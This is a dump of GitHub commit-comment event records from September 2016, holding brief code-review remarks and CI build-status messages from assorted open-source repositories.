{"id":"4626819518","type":"CommitCommentEvent","actor":{"login":"mitchell-as"},"repo":{"name":"Komodo/komodo-go"},"payload":{"comment":{"id":19197825,"position":6,"line":118,"path":"components/koGoLanguage.py","commit_id":"14282c20d7b8c5e33c89d90c716665d15bcac346","created_at":"2016-09-27T20:43:33Z","updated_at":"2016-09-27T20:43:33Z","body":"Yes, that is the assumption."}},"created_at":"2016-09-27T20:43:33Z"}
{"id":"4626822205","type":"CommitCommentEvent","actor":{"login":"gbadner"},"repo":{"name":"hibernate/hibernate-orm"},"payload":{"comment":{"id":19197830,"position":null,"line":null,"path":null,"commit_id":"d2d947068d1d10368f423ef42cdfb958ec92c95d","created_at":"2016-09-27T20:44:00Z","updated_at":"2016-09-27T20:44:00Z","body":"Merged. Thanks!"}},"created_at":"2016-09-27T20:44:00Z"}
{"id":"4626822449","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":19197831,"position":63,"line":63,"path":"1709_1_SecondProjectTask/1709_1_SecondProjectTask/MainViewController.swift","commit_id":"58e6fa47fa1a554e42662fc039516de49260e507","created_at":"2016-09-27T20:44:04Z","updated_at":"2016-09-27T20:44:04Z","body":"jel mozes napraviti npr klasu DPButton koja extenda UIButton i onda definisati da button ima ove properties, tako da ne moras za svaki button definisati/"}},"created_at":"2016-09-27T20:44:04Z"}
{"id":"4626822992","type":"CommitCommentEvent","actor":{"login":"lidel"},"repo":{"name":"lidel/ipfs-firefox-addon"},"payload":{"comment":{"id":19197833,"position":31,"line":41,"path":"manifest.json","commit_id":"0bed5ecde13fd7251f4cef5eaa275ab8275fa42f","created_at":"2016-09-27T20:44:10Z","updated_at":"2016-09-27T20:44:10Z","body":"`unsafe-eval` is required by the code generated by browserify "}},"created_at":"2016-09-27T20:44:10Z"}
{"id":"4626826123","type":"CommitCommentEvent","actor":{"login":"Gammadrill"},"repo":{"name":"erikflowers/weather-icons"},"payload":{"comment":{"id":19197840,"position":6,"line":25,"path":"less/weather-icons.min.less","commit_id":"62840ef298158bbc988d62279bb6f12e441efda9","created_at":"2016-09-27T20:44:43Z","updated_at":"2016-09-27T20:44:43Z","body":"`ret56`\r\n@wesbos terr"}},"created_at":"2016-09-27T20:44:43Z"}
{"id":"4626827684","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":19197848,"position":78,"line":78,"path":"1709_1_SecondProjectTask/1709_1_SecondProjectTask/MainViewController.swift","commit_id":"58e6fa47fa1a554e42662fc039516de49260e507","created_at":"2016-09-27T20:45:00Z","updated_at":"2016-09-27T20:45:00Z","body":"jesi li mogao 1 segmented controll koristiti, i onda kad korisnik klikne samo promjeniti vrijednosti?"}},"created_at":"2016-09-27T20:45:00Z"}
{"id":"4626828053","type":"CommitCommentEvent","actor":{"login":"andrevargas"},"repo":{"name":"LabRedesUNIVALI/Hercules"},"payload":{"comment":{"id":19197850,"position":null,"line":null,"path":null,"commit_id":"10bf5ff9fceb9bd8cd5a5721abbceebcada0803f","created_at":"2016-09-27T20:45:05Z","updated_at":"2016-09-27T20:45:05Z","body":"Ainda não finalizado e devidamente testado, commit apenas para manter as alterações no repositório remoto."}},"created_at":"2016-09-27T20:45:05Z"}
{"id":"4626830739","type":"CommitCommentEvent","actor":{"login":"qaisjp"},"repo":{"name":"qaisjp/inf1.hgs.club"},"payload":{"comment":{"id":19197855,"position":null,"line":null,"path":null,"commit_id":"7c94c22fc4fc685a53520d93eac6810417e91353","created_at":"2016-09-27T20:45:33Z","updated_at":"2016-09-27T20:45:33Z","body":"👍 \r\n"}},"created_at":"2016-09-27T20:45:33Z"}
{"id":"4626830951","type":"CommitCommentEvent","actor":{"login":"bogdanpolak"},"repo":{"name":"bogdanpolak/vcl-birthday"},"payload":{"comment":{"id":19197857,"position":9,"line":25,"path":"uPerson.pas","commit_id":"e927ad3e4fd76bb9d33ac2bbbcaa86c4c23db5f9","created_at":"2016-09-27T20:45:36Z","updated_at":"2016-09-27T20:45:36Z","body":"Implementacja za pomocą ClassHelpers ?"}},"created_at":"2016-09-27T20:45:36Z"}
{"id":"4626832409","type":"CommitCommentEvent","actor":{"login":"okozlovlux"},"repo":{"name":"OlehKozlov/MadFood"},"payload":{"comment":{"id":19197861,"position":22,"line":34,"path":"app/src/main/java/ua/kozlov/madfood/database/DatabaseManager.java","commit_id":"593f4fb104db6641b6db68ff03c5c9a0816d6de9","created_at":"2016-09-27T20:45:52Z","updated_at":"2016-09-27T20:45:52Z","body":"@OlehKozlov , can all args be const?\r\ncan pass String as reference?"}},"created_at":"2016-09-27T20:45:52Z"}
{"id":"4626832969","type":"CommitCommentEvent","actor":{"login":"Naatan"},"repo":{"name":"Komodo/komodo-go"},"payload":{"comment":{"id":19197863,"position":6,"line":118,"path":"components/koGoLanguage.py","commit_id":"14282c20d7b8c5e33c89d90c716665d15bcac346","created_at":"2016-09-27T20:45:57Z","updated_at":"2016-09-27T20:45:57Z","body":"That exposes us to a new bug then. Can you open a new bug to address this properly? We're explicitly not making this assumption on other executables, so we shouldn't start now with this one."}},"created_at":"2016-09-27T20:45:57Z"}
{"id":"4626833328","type":"CommitCommentEvent","actor":{"login":"bogdanpolak"},"repo":{"name":"bogdanpolak/vcl-birthday"},"payload":{"comment":{"id":19197864,"position":9,"line":25,"path":"uPerson.pas","commit_id":"e927ad3e4fd76bb9d33ac2bbbcaa86c4c23db5f9","created_at":"2016-09-27T20:46:01Z","updated_at":"2016-09-27T20:46:01Z","body":"Czy warto?"}},"created_at":"2016-09-27T20:46:01Z"}
{"id":"4626837449","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19197869,"position":null,"line":null,"path":null,"commit_id":"8e27dad5c9d3cfd72fdac6733b48b310e8dea506","created_at":"2016-09-27T20:46:43Z","updated_at":"2016-09-27T20:46:43Z","body":"license-update (axelstudios) - Win64-Windows-7-VisualStudio-12: OK (2412 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8e27dad5c9d3cfd72fdac6733b48b310e8dea506-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8e27dad5c9d3cfd72fdac6733b48b310e8dea506-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.53%25-yellow.svg)</a> \n"}},"created_at":"2016-09-27T20:46:43Z"}
{"id":"4626837552","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":19197871,"position":150,"line":150,"path":"1709_1_SecondProjectTask/1709_1_SecondProjectTask/MainViewController.swift","commit_id":"58e6fa47fa1a554e42662fc039516de49260e507","created_at":"2016-09-27T20:46:44Z","updated_at":"2016-09-27T20:46:44Z","body":"moze umjesto printa alert"}},"created_at":"2016-09-27T20:46:44Z"}
{"id":"4626838276","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19197878,"position":null,"line":null,"path":null,"commit_id":"b6edcf3c32453f1023d4b94962006ff90ec61550","created_at":"2016-09-27T20:46:52Z","updated_at":"2016-09-27T20:46:52Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=83)"}},"created_at":"2016-09-27T20:46:52Z"}
{"id":"4626838294","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19197879,"position":null,"line":null,"path":null,"commit_id":"9a0e7383b508354a58cea8813340c16b9e5ffa8a","created_at":"2016-09-27T20:46:53Z","updated_at":"2016-09-27T20:46:53Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=83)"}},"created_at":"2016-09-27T20:46:53Z"}
{"id":"4626838452","type":"CommitCommentEvent","actor":{"login":"JosiahRWS"},"repo":{"name":"ivy-solutions/Visitry"},"payload":{"comment":{"id":19197880,"position":null,"line":null,"path":null,"commit_id":"e0852d4100aef47ddc0428f515668b3161b61093","created_at":"2016-09-27T20:46:55Z","updated_at":"2016-09-27T20:46:55Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://dev.visitry.org/ui#review:id=83)"}},"created_at":"2016-09-27T20:46:55Z"}
{"id":"4626838899","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":19197882,"position":155,"line":155,"path":"1709_1_SecondProjectTask/1709_1_SecondProjectTask/MainViewController.swift","commit_id":"58e6fa47fa1a554e42662fc039516de49260e507","created_at":"2016-09-27T20:46:59Z","updated_at":"2016-09-27T20:46:59Z","body":"ovdje mora biti alert"}},"created_at":"2016-09-27T20:46:59Z"}
{"id":"4626839860","type":"CommitCommentEvent","actor":{"login":"okozlovlux"},"repo":{"name":"OlehKozlov/MadFood"},"payload":{"comment":{"id":19197887,"position":55,"line":66,"path":"app/src/main/java/ua/kozlov/madfood/database/DatabaseManager.java","commit_id":"593f4fb104db6641b6db68ff03c5c9a0816d6de9","created_at":"2016-09-27T20:47:10Z","updated_at":"2016-09-27T20:47:10Z","body":"@OlehKozlov , `Foods size` looks understandable"}},"created_at":"2016-09-27T20:47:10Z"}
{"id":"4626840912","type":"CommitCommentEvent","actor":{"login":"noslouch"},"repo":{"name":"nypublicradio/ember-hifi"},"payload":{"comment":{"id":19197889,"position":null,"line":null,"path":null,"commit_id":"9e8508519090cfef5a93fbcaaa6986cc7702483e","created_at":"2016-09-27T20:47:19Z","updated_at":"2016-09-27T20:47:19Z","body":"🎆 "}},"created_at":"2016-09-27T20:47:19Z"}
{"id":"4626846439","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":19197897,"position":169,"line":169,"path":"1709_1_SecondProjectTask/1709_1_SecondProjectTask/MainViewController.swift","commit_id":"58e6fa47fa1a554e42662fc039516de49260e507","created_at":"2016-09-27T20:48:18Z","updated_at":"2016-09-27T20:48:18Z","body":"mozes reuse ovu funkciju samo joj proslijedi title i message"}},"created_at":"2016-09-27T20:48:18Z"}
{"id":"4626847597","type":"CommitCommentEvent","actor":{"login":"nickbutcher"},"repo":{"name":"nickbutcher/plaid"},"payload":{"comment":{"id":19197900,"position":118,"line":283,"path":"app/src/main/java/io/plaidapp/ui/widget/BottomSheet.java","commit_id":"69fefeb683d0bc08aba45d7edea71c8927fb476c","created_at":"2016-09-27T20:48:30Z","updated_at":"2016-09-27T20:48:30Z","body":"Indeed. I'm inclined to keep it despite it's redundancy as I think it makes the 4 states more readable. WDYT?"}},"created_at":"2016-09-27T20:48:30Z"}
{"id":"4626849466","type":"CommitCommentEvent","actor":{"login":"zajc3w"},"repo":{"name":"raidernick/KOSMOS"},"payload":{"comment":{"id":19197908,"position":null,"line":null,"path":null,"commit_id":"a58d791cc761146d0eba24309bb8f05ced36e08d","created_at":"2016-09-27T20:48:51Z","updated_at":"2016-09-27T20:48:51Z","body":"Erkhm, last number is node size.\r\nnode Y axis direction (up/down) is number 5.\r\nnode_stack_bottom = 0.0, -0.9806652, 0.0, 0.0, -1.0, 0.0, 1"}},"created_at":"2016-09-27T20:48:51Z"}
{"id":"4626849518","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":19197910,"position":179,"line":179,"path":"1709_1_SecondProjectTask/1709_1_SecondProjectTask/MainViewController.swift","commit_id":"58e6fa47fa1a554e42662fc039516de49260e507","created_at":"2016-09-27T20:48:51Z","updated_at":"2016-09-27T20:48:51Z","body":"grupisi messageComposer funkcije zajedno i koristi //MARK"}},"created_at":"2016-09-27T20:48:51Z"}
{"id":"4626849823","type":"CommitCommentEvent","actor":{"login":"robbiecarlton"},"repo":{"name":"Hylozoic/hylo-redux"},"payload":{"comment":{"id":19197912,"position":null,"line":null,"path":null,"commit_id":"5a01c6a3f81d0e26a1e0dcdf3f1c02987ca05dd1","created_at":"2016-09-27T20:48:55Z","updated_at":"2016-09-27T20:48:55Z","body":"That's a lot of duplication... Like, both the front end and back end then need to know what each item in the checklist is and the logic for checking if it's complete."}},"created_at":"2016-09-27T20:48:55Z"}
{"id":"4626852173","type":"CommitCommentEvent","actor":{"login":"okozlovlux"},"repo":{"name":"OlehKozlov/MadFood"},"payload":{"comment":{"id":19197916,"position":60,"line":71,"path":"app/src/main/java/ua/kozlov/madfood/database/DatabaseManager.java","commit_id":"593f4fb104db6641b6db68ff03c5c9a0816d6de9","created_at":"2016-09-27T20:49:22Z","updated_at":"2016-09-27T20:49:22Z","body":"@OlehKozlov , `getLastId`... Id of what? \r\nPlease, write more specific names"}},"created_at":"2016-09-27T20:49:22Z"}
{"id":"4626853461","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":19197920,"position":194,"line":194,"path":"1709_1_SecondProjectTask/1709_1_SecondProjectTask/MainViewController.swift","commit_id":"58e6fa47fa1a554e42662fc039516de49260e507","created_at":"2016-09-27T20:49:36Z","updated_at":"2016-09-27T20:49:36Z","body":"mozes li vrapati selected contact if let contact = contact ..."}},"created_at":"2016-09-27T20:49:36Z"}
{"id":"4626855261","type":"CommitCommentEvent","actor":{"login":"okozlovlux"},"repo":{"name":"OlehKozlov/MadFood"},"payload":{"comment":{"id":19197924,"position":64,"line":75,"path":"app/src/main/java/ua/kozlov/madfood/database/DatabaseManager.java","commit_id":"593f4fb104db6641b6db68ff03c5c9a0816d6de9","created_at":"2016-09-27T20:49:55Z","updated_at":"2016-09-27T20:49:55Z","body":"@OlehKozlov , why `-1`?"}},"created_at":"2016-09-27T20:49:55Z"}
{"id":"4626858259","type":"CommitCommentEvent","actor":{"login":"okozlovlux"},"repo":{"name":"OlehKozlov/MadFood"},"payload":{"comment":{"id":19197931,"position":73,"line":84,"path":"app/src/main/java/ua/kozlov/madfood/database/DatabaseManager.java","commit_id":"593f4fb104db6641b6db68ff03c5c9a0816d6de9","created_at":"2016-09-27T20:50:27Z","updated_at":"2016-09-27T20:50:27Z","body":"@OlehKozlov , `0` ? magic number"}},"created_at":"2016-09-27T20:50:27Z"}
{"id":"4626860694","type":"CommitCommentEvent","actor":{"login":"stormbreakerbg"},"repo":{"name":"stormbreakerbg/Dark-youtube-plugin-chrome"},"payload":{"comment":{"id":19197936,"position":null,"line":null,"path":null,"commit_id":"b4fef246bc49f7e223a88c89a6bf8d43e94ee063","created_at":"2016-09-27T20:50:54Z","updated_at":"2016-09-27T20:50:54Z","body":"@Dancanplay, thank you for the version bump and the changelog :) The changelog is a really nice touch, very  helpful :)"}},"created_at":"2016-09-27T20:50:54Z"}
{"id":"4626862642","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":19197938,"position":16,"line":16,"path":"1709_1_SecondProjectTask/1709_1_SecondProjectTask/ContactTableViewCell.swift","commit_id":"58e6fa47fa1a554e42662fc039516de49260e507","created_at":"2016-09-27T20:51:14Z","updated_at":"2016-09-27T20:51:14Z","body":"pobrisi ove prazne linije"}},"created_at":"2016-09-27T20:51:14Z"}
{"id":"4626863088","type":"CommitCommentEvent","actor":{"login":"stormbreakerbg"},"repo":{"name":"stormbreakerbg/Dark-youtube-plugin-chrome"},"payload":{"comment":{"id":19197940,"position":null,"line":null,"path":null,"commit_id":"b4fef246bc49f7e223a88c89a6bf8d43e94ee063","created_at":"2016-09-27T20:51:19Z","updated_at":"2016-09-27T20:51:19Z","body":"Uploaded it to the chrome and opera stores."}},"created_at":"2016-09-27T20:51:19Z"}
{"id":"4626865553","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":19197947,"position":65,"line":65,"path":"1709_1_SecondProjectTask/1709_1_SecondProjectTask/ContactTableViewController.swift","commit_id":"58e6fa47fa1a554e42662fc039516de49260e507","created_at":"2016-09-27T20:51:46Z","updated_at":"2016-09-27T20:51:46Z","body":"prazne linije"}},"created_at":"2016-09-27T20:51:46Z"}
{"id":"4626870294","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":19197957,"position":111,"line":111,"path":"1709_1_SecondProjectTask/1709_1_SecondProjectTask/ContactTableViewController.swift","commit_id":"58e6fa47fa1a554e42662fc039516de49260e507","created_at":"2016-09-27T20:52:38Z","updated_at":"2016-09-27T20:52:38Z","body":"sto ti je contact !"}},"created_at":"2016-09-27T20:52:38Z"}
{"id":"4626870327","type":"CommitCommentEvent","actor":{"login":"katyaabaz"},"repo":{"name":"NeighborhoodInfoDC/PresCat"},"payload":{"comment":{"id":19197958,"position":null,"line":null,"path":null,"commit_id":"9412909972cd2ba8a9f69234041d1942dc59f727","created_at":"2016-09-27T20:52:38Z","updated_at":"2016-09-27T20:52:38Z","body":"@ptatian Hi Peter, do you know whether the REMS_property_id on the REAC dataset is an ID we can use to match to NLIHC_ID? "}},"created_at":"2016-09-27T20:52:38Z"}
{"id":"4626871275","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":19197960,"position":124,"line":124,"path":"1709_1_SecondProjectTask/1709_1_SecondProjectTask/ContactTableViewController.swift","commit_id":"58e6fa47fa1a554e42662fc039516de49260e507","created_at":"2016-09-27T20:52:48Z","updated_at":"2016-09-27T20:52:48Z","body":"alert"}},"created_at":"2016-09-27T20:52:48Z"}
{"id":"4626871440","type":"CommitCommentEvent","actor":{"login":"joakimk"},"repo":{"name":"barsoom/review"},"payload":{"comment":{"id":19197961,"position":5,"line":8,"path":"lib/review/repo.ex","commit_id":"9bb49d2ffd476d653945cc2bc8c1311653ea01ac","created_at":"2016-09-27T20:52:50Z","updated_at":"2016-09-27T20:52:50Z","body":"This is a test of persisting review comments and showing them on https://review-on-review.herokuapp.com/comments?auth_key=demo."}},"created_at":"2016-09-27T20:52:50Z"}
{"id":"4626873782","type":"CommitCommentEvent","actor":{"login":"bryzaguy"},"repo":{"name":"smyte/jsxstyle"},"payload":{"comment":{"id":19197965,"position":22,"line":46,"path":"src/makeStyleComponentClass.js","commit_id":"c4461c7c208139063d241140068cc88fcdb56c5e","created_at":"2016-09-27T20:53:15Z","updated_at":"2016-09-27T20:53:15Z","body":"oh"}},"created_at":"2016-09-27T20:53:15Z"}
{"id":"4626876134","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19197974,"position":12,"line":86,"path":"SQF/dayz_code/compile/fn_unconscious.sqf","commit_id":"341d45f440092be3f28864342f8986237217732b","created_at":"2016-09-27T20:53:39Z","updated_at":"2016-09-27T20:53:39Z","body":"This playMoveNow appears to be necessary in some cases. The case I found was:\r\n1. Shoot near your feet with an M136 or MAAWS launcher. It should bring you down to half health and knock you out.\r\n2. When your timer is up you are stuck in the knocked out animation and can't move.\r\n\r\nI repeated the above steps a few times to confirm. When I uncommented this and tested again the problem was gone.\r\n\r\nUncommented here: 79c6d60"}},"created_at":"2016-09-27T20:53:39Z"}
{"id":"4626879730","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":19197983,"position":51,"line":51,"path":"1709_1_SecondProjectTask/1709_1_SecondProjectTask/NewContactViewController.swift","commit_id":"58e6fa47fa1a554e42662fc039516de49260e507","created_at":"2016-09-27T20:54:18Z","updated_at":"2016-09-27T20:54:18Z","body":"subclass text filed"}},"created_at":"2016-09-27T20:54:18Z"}
{"id":"4626880065","type":"CommitCommentEvent","actor":{"login":"budnyjj"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":19197984,"position":null,"line":null,"path":null,"commit_id":"9920f92a1fe354d52884c49fbb32144bf5b1389b","created_at":"2016-09-27T20:54:21Z","updated_at":"2016-09-27T20:54:21Z","body":"How about using list of date objects and method, which will check that input date is between any two of them?"}},"created_at":"2016-09-27T20:54:21Z"}
{"id":"4626880467","type":"CommitCommentEvent","actor":{"login":"jutkko"},"repo":{"name":"pivotal-cf/cf-rabbitmq-release"},"payload":{"comment":{"id":19197986,"position":null,"line":null,"path":null,"commit_id":"aff3de1e760cdc32e7449f9d3bbd24e572833ddc","created_at":"2016-09-27T20:54:26Z","updated_at":"2016-09-27T20:54:26Z","body":"@xiujiao hey here is your code!"}},"created_at":"2016-09-27T20:54:26Z"}
{"id":"4626881261","type":"CommitCommentEvent","actor":{"login":"jsha"},"repo":{"name":"ietf-wg-acme/acme"},"payload":{"comment":{"id":19197992,"position":null,"line":null,"path":null,"commit_id":"2258367a139a08796e9c712ca223db604b7495c2","created_at":"2016-09-27T20:54:34Z","updated_at":"2016-09-27T20:54:34Z","body":"I included self-signed, because there are some certificates that one might consider a trust anchor but could still be included. Specifically, if you have a cross-signed version of a root, and your root is not yet broadly propagated, you might choose to offer a copy of that cross-signed root as part of a handshake."}},"created_at":"2016-09-27T20:54:34Z"}
{"id":"4626881717","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19197995,"position":null,"line":null,"path":null,"commit_id":"8a6c19b968c4e61b4b79e59bdb4f8c5745502c1a","created_at":"2016-09-27T20:54:38Z","updated_at":"2016-09-27T20:54:38Z","body":"ENERGYPLUS_EXPECTED_HASH (evanweaver) - x86_64-MacOS-10.10-clang: OK (2390 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8a6c19b968c4e61b4b79e59bdb4f8c5745502c1a-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8a6c19b968c4e61b4b79e59bdb4f8c5745502c1a-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.63%25-yellow.svg)</a> \n"}},"created_at":"2016-09-27T20:54:38Z"}
{"id":"4626890435","type":"CommitCommentEvent","actor":{"login":"okozlovlux"},"repo":{"name":"OlehKozlov/MadFood"},"payload":{"comment":{"id":19198005,"position":33,"line":48,"path":"app/src/main/java/ua/kozlov/madfood/ui/MainActivity.java","commit_id":"593f4fb104db6641b6db68ff03c5c9a0816d6de9","created_at":"2016-09-27T20:56:07Z","updated_at":"2016-09-27T20:56:07Z","body":"@OlehKozlov , `Fir**s**t`"}},"created_at":"2016-09-27T20:56:07Z"}
{"id":"4626894616","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":19198013,"position":null,"line":null,"path":null,"commit_id":"58e6fa47fa1a554e42662fc039516de49260e507","created_at":"2016-09-27T20:56:48Z","updated_at":"2016-09-27T20:56:48Z","body":"lijepo izgleda. s obzirom da si ti dosta dobar u ovome poslu zelim ti skrenuti par stvari: \r\n- kod ti je poprilicno neuredan, i na tome trebas poraditi da to ljepse izgleda, pogotovo spacing, alignment i sl\r\n- subclass objekte koje vidis da se ponavljaju\r\n- pazi da nemas forced unwrapping \r\n\r\nostalo je ok, mislim da razumijes o cemu ti ovo gore govorim"}},"created_at":"2016-09-27T20:56:48Z"}
{"id":"4626895426","type":"CommitCommentEvent","actor":{"login":"SubJunk"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19198015,"position":null,"line":null,"path":null,"commit_id":"9aa7a72a4adc364a566fc805c163e478e9953049","created_at":"2016-09-27T20:56:57Z","updated_at":"2016-09-27T20:56:57Z","body":"@Nadahar VLC for desktop gets frozen/looped and doesn't work for me, so it's related to this group of commits where we added support for the program"}},"created_at":"2016-09-27T20:56:57Z"}
{"id":"4626898698","type":"CommitCommentEvent","actor":{"login":"guillaumebort"},"repo":{"name":"AlexGalays/loop"},"payload":{"comment":{"id":19198020,"position":null,"line":null,"path":null,"commit_id":"40fbcbeee46f7c1cc7a46be716cdc460cd78fc89","created_at":"2016-09-27T20:57:31Z","updated_at":"2016-09-27T20:57:31Z","body":"Ok, does it still allow to load standard modules?"}},"created_at":"2016-09-27T20:57:31Z"}
{"id":"4626899354","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"Jutho/TensorOperations.jl"},"payload":{"comment":{"id":19198022,"position":null,"line":null,"path":null,"commit_id":"5f11d86ea8fdee6428ebcb2ea0fa5f26c27b4c8a","created_at":"2016-09-27T20:57:39Z","updated_at":"2016-09-27T20:57:39Z","body":"why?"}},"created_at":"2016-09-27T20:57:39Z"}
{"id":"4626900880","type":"CommitCommentEvent","actor":{"login":"sil22"},"repo":{"name":"eloymazza/tio-eloy"},"payload":{"comment":{"id":19198027,"position":7,"line":4,"path":"ejemplo1-tio.md","commit_id":"15587209d2e5e15493be1707ba64f1b6cfce6e9f","created_at":"2016-09-27T20:57:56Z","updated_at":"2016-09-27T20:57:56Z","body":"aca hay un error eloy"}},"created_at":"2016-09-27T20:57:56Z"}
{"id":"4626902758","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"Jutho/TensorOperations.jl"},"payload":{"comment":{"id":19198034,"position":5,"line":5,"path":".travis.yml","commit_id":"d77361b9fc614bb213d6611bf404cd891b4eace2","created_at":"2016-09-27T20:58:17Z","updated_at":"2016-09-27T20:58:17Z","body":"it's usually worth testing across as many platforms as you can"}},"created_at":"2016-09-27T20:58:17Z"}
{"id":"4626909012","type":"CommitCommentEvent","actor":{"login":"TheAlphaNerd"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":19198053,"position":null,"line":null,"path":null,"commit_id":"6b443d1731a03ec1e7d207d31ee361b1e3ead646","created_at":"2016-09-27T20:59:22Z","updated_at":"2016-09-27T20:59:22Z","body":"HOT FIX"}},"created_at":"2016-09-27T20:59:22Z"}
{"id":"4626910338","type":"CommitCommentEvent","actor":{"login":"okozlovlux"},"repo":{"name":"OlehKozlov/MadFood"},"payload":{"comment":{"id":19198056,"position":70,"line":70,"path":"app/src/main/java/ua/kozlov/madfood/ui/SameFoodFragment.java","commit_id":"593f4fb104db6641b6db68ff03c5c9a0816d6de9","created_at":"2016-09-27T20:59:38Z","updated_at":"2016-09-27T20:59:38Z","body":"@OlehKozlov , empty  methods?"}},"created_at":"2016-09-27T20:59:38Z"}
{"id":"4626911192","type":"CommitCommentEvent","actor":{"login":"hamzaze"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":19198060,"position":null,"line":null,"path":null,"commit_id":"58e6fa47fa1a554e42662fc039516de49260e507","created_at":"2016-09-27T20:59:47Z","updated_at":"2016-09-27T20:59:47Z","body":"Slazem se u potpunosti,. Ovo je v1. Proci cu kroz primjedbe i napraviti v2\ni commit-ati.\n\n2016-09-27 22:56 GMT+02:00 irfanG <notifications@github.com>:\n\n> lijepo izgleda. s obzirom da si ti dosta dobar u ovome poslu zelim ti\n> skrenuti par stvari:\n>\n>    - kod ti je poprilicno neuredan, i na tome trebas poraditi da to\n>    ljepse izgleda, pogotovo spacing, alignment i sl\n>    - subclass objekte koje vidis da se ponavljaju\n>    - pazi da nemas forced unwrapping\n>\n> ostalo je ok, mislim da razumijes o cemu ti ovo gore govorim\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/hamzaze/ios-journey/commit/58e6fa47fa1a554e42662fc039516de49260e507#commitcomment-19198013>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATHqxGLC5L1ZHT997vOZ2RE3YgkcRdtrks5quYMRgaJpZM4KIIix>\n> .\n>\n"}},"created_at":"2016-09-27T20:59:47Z"}
{"id":"4626912374","type":"CommitCommentEvent","actor":{"login":"okozlovlux"},"repo":{"name":"OlehKozlov/MadFood"},"payload":{"comment":{"id":19198063,"position":70,"line":70,"path":"app/src/main/java/ua/kozlov/madfood/ui/SameFoodFragment.java","commit_id":"593f4fb104db6641b6db68ff03c5c9a0816d6de9","created_at":"2016-09-27T20:59:59Z","updated_at":"2016-09-27T20:59:59Z","body":"@OlehKozlov , can args be const?"}},"created_at":"2016-09-27T20:59:59Z"}
{"id":"4626913156","type":"CommitCommentEvent","actor":{"login":"OwnageIsMagic"},"repo":{"name":"VkOpt/VkOpt"},"payload":{"comment":{"id":19198067,"position":null,"line":null,"path":null,"commit_id":"8a4a8a30358e958b3cf93a957730829fd1b8d1fc","created_at":"2016-09-27T21:00:09Z","updated_at":"2016-09-27T21:00:09Z","body":"А то что, у меня постоянно vkopt апи дёргает их не тревожит ? )"}},"created_at":"2016-09-27T21:00:09Z"}
{"id":"4626915435","type":"CommitCommentEvent","actor":{"login":"segrey"},"repo":{"name":"JetBrains/mocha-intellij"},"payload":{"comment":{"id":19198070,"position":null,"line":null,"path":null,"commit_id":"8cd529aea343a001ab555571b883d63e5556ef83","created_at":"2016-09-27T21:00:32Z","updated_at":"2016-09-27T21:00:32Z","body":"@boneskull What checks do you mean?\r\n`require('./lib/mocha-intellij-stringifier.js').stringify(value)` is just a wrapper around `require('mocha//lib/utils').stringify(value)`"}},"created_at":"2016-09-27T21:00:32Z"}
